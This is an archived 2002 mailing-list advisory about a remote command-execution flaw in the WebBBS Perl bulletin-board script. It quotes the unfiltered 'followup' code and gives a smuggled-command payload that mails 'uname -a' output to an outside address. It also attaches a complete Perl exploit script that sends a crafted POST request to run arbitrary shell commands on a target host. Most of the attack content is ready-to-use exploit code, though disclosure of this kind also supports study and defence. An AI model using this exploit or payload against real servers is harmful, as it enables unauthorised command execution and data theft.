WebBBS 5.0 (andlater versions) vulnerable: allow commands execution via "followup" bug

From: nerf gr0up nerf (vipersvat_private)
Date: Tue Jun 18 2002 - 11:39:58 PDT

Next message: Dave Ahmad: "Fixed version of Apache 1.3 available"

Previous message: Spot: "Mandrake 8.2 msec security issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) --== Nerf gr0up: adv #7 ==-- WebBBS remote command execution Vulnerable: WebBBS by Darryl Burgdorf (http://awsd.com/scripts/webbbs/). All versions are vulnerable. WebBBS is a Web-based bulletin board. WebBBS stores messages as simple text files. Description: WebBBS script allows command execution on server. This script does no filtering and due to this remote command execution is possible. The vulnerable code is shown below: ----- webbbs_post.pl: ... if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; } ... if ($followup) { ... $subdir = "bbs".int($followup/1000); open (FOLLOWUP,"$dir/$subdir/$followup"); ... ----- Just change the value of $followup variable, e.g "followup=10" to "followup=10;uname -a|mail zloat_private|" to exploit this vulnerability. btr nerf www.nerf.ru Attach (exploit in perl): #!/usr/bin/perl # # nerF gr0up # # exploit code for # WebBBS by Darryl C. Burgdorf # all version up to 5.00 are vulnerable # # # this is an exploitation of "followup" bug. # it allows remote attacker to execute shell commands. # you can find WebBBS script at http://awsd.com/scripts/webbbs/ # # 06.06.2002 # btr // nerf # nerf.ru use IO::Socket; srand(); $script = "/cgi-bin/webbbs/webbbs_config.pl"; $command = "uname -a|mail zloat_private"; $host = "localhost"; $port = 80; $content = "$content" . "name=" . rand(254); $content = "$content" . "&email=" . rand(254); $content = "$content" . "&subject=" . rand(254); $content = "$content" . "&body=" . rand(254); $content="$content"."&followup=".rand(254)."|$command|"; $content_length = length($content); $content_type = "application/x-www-form-urlencoded"; if (@ARGV[0]) {$command=@ARGV[0];} if (@ARGV[1]) {$host=@ARGV[1];} if (@ARGV[2]) {$script=@ARGV[2];} $buf = "POST " . "$script" . "?post HTTP/1.0\n"; $buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:"; $buf = "$buf" . "$content_length\r\n\r\n$content", 0; print "\tnerF gr0up\n"; print "exploit: WebBBS (awsd.com), version up to 5.00\n"; print "sent:\n$buf\n"; if($socket = IO::Socket::INET->new("$host:$port")){ print $socket "$buf"; read($socket,$buf,1500); print "recieved:\n$buf\n"; }

Next message: Dave Ahmad: "Fixed version of Apache 1.3 available"
Previous message: Spot: "Mandrake 8.2 msec security issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 18 2002 - 15:19:32 PDT